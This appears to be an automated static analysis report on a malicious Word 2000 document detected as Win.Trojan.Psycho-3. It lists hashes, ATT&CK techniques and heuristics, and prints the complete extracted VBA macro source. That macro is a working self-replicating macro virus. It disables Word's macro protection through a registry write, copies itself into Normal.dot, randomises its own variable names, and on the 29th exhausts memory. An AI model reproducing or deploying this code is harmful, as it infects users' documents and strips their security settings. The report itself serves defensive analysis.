Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8ce3f05a23700601…

MALICIOUS

Office (OLE)

Size: 119.5 KB
Created: 2000-07-03 22:00:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 462415db2117fd00f54a482eed003a03
SHA-1: 829b78163e482eb3c10953f642cd55e02c7f8142
SHA-256: 8ce3f05a23700601827f97cdcc91ad4039e331f13e68bed71a320b3a847e0fb5
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious OLE document containing VBA macros. Its Document_Open macro attempts to lower Word's macro security settings and to copy its own code into the Normal template (Normal.dot) and the active document, which would cause the macro to run in every document opened afterwards and so establish persistence. The ClamAV detection as 'Win.Trojan.Psycho-3' further supports the malicious verdict. Specifically, the macro writes the value Level under the registry key HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security and sets Options.VirusProtection to False to disable Word's built-in macro virus protection.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document contains a Document_Open macro that runs automatically when the file is opened

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3071 bytes
SHA-256: fd9a018a69f770449c3223bfe960c08d746b91eaea72e7a376b5b9a8f1855791

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
mbopl1mbop = "M"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Options.VirusProtection = False
Options.SaveNormalPrompt = False
mbopfimbop = 7
Options.ConfirmConversions = False
Set mbopNtmbop = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
Set mbopAdmbop = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
Set mbopTdmbop = ThisDocument.VBProject.VBComponents.Item(1).CodeModule
mbopsembop = 5
mbopl2mbop = "b"
mbopfnmbop = mbopfimbop & mbopsembop
For mbopiimbop = 1 To mbopTdmbop.countoflines
If InStr(mbopTdmbop.lines(mbopiimbop, 1), "Private Sub Document_Open()") <> 0 Then
mbopSlmbop = mbopiimbop
Exit For
End If
Next
mbopl3mbop = "o"
mbopVcmbop = Trim(mbopTdmbop.lines(mbopSlmbop, mbopSlmbop + mbopfnmbop))
mboplvmbop = 97
If mbopNtmbop.countoflines > 0 Then
mbopNlmbop = mbopNtmbop.lines(1, mbopNtmbop.countoflines)
If InStr(mbopNlmbop, "Nt") = 0 And InStr(mbopNlmbop, "Sl") = 0 And InStr(mbopNlmbop, "Nl") = 0 And InStr(mbopNlmbop, "Ad") = 0 And InStr(mbopNlmbop, "Vc") = 0 And InStr(mbopNlmbop, "Td") = 0 Then
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
Else
mbopNtmbop.addfromstring mbopVcmbop
mbopinmbop = True
End If
mbophvmbop = 122
If mbopAdmbop.countoflines > 0 Then
mbopAlmbop = mbopAdmbop.lines(1, mbopAdmbop.countoflines)
If InStr(mbopAlmbop, "Nt") = 0 And InStr(mbopAlmbop, "Sl") = 0 And InStr(mbopAlmbop, "Nl") = 0 And InStr(mbopAlmbop, "Ad") = 0 And InStr(mbopAlmbop, "Vc") = 0 And InStr(mbopAlmbop, "Td") = 0 Then
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
Else
mbopAdmbop.addfromstring mbopVcmbop
mbopiambop = True
End If
mbopl4mbop = "p"
For mbopiimbop = 1 To 15
Randomize
mbopTnmbop = mbopTnmbop & Chr(Int((mbophvmbop - mboplvmbop + 1) * Rnd + mboplvmbop))
Next
mbopd2mbop = 9
mbopVcmbop = mbopTdmbop.lines(1, mbopTdmbop.countoflines)
mbopTdmbop.deletelines 1, mbopTdmbop.countoflines
Do While InStr(mbopVcmbop, "mbop") <> 0
mbopVcmbop = Mid(mbopVcmbop, 1, InStr(mbopVcmbop, "mbop") - 1) & mbopTnmbop & Mid(mbopVcmbop, InStr(mbopVcmbop, "mbop") + Len("mbop"))
Loop
mbopTdmbop.addfromstring mbopVcmbop
mbopDymbop = Day(Now)
mbopd1mbop = 2
mbopl5mbop = "!"
If mbopDymbop = mbopd1mbop & mbopd2mbop Then
Dim mbopstmbop()
mbopcambop = 0
Do
ReDim Preserve mbopstmbop(mbopcambop)
mbopqwmbop = CLng(1024)
mbopqambop = mbopqwmbop
mbopqzmbop = mbopqwmbop * mbopqambop
mbopstmbop(mbopcambop) = String(mbopqzmbop, Right(mbopTnmbop, 1))
DoEvents
mbopcambop = mbopcambop + 1
Loop
End If
If mbopiambop = True Or mbopinmbop = True Then
MsgBox mbopl1mbop & mbopl2mbop & mbopl3mbop & mbopl4mbop & mbopl5mbop, vbCritical
End If
End Sub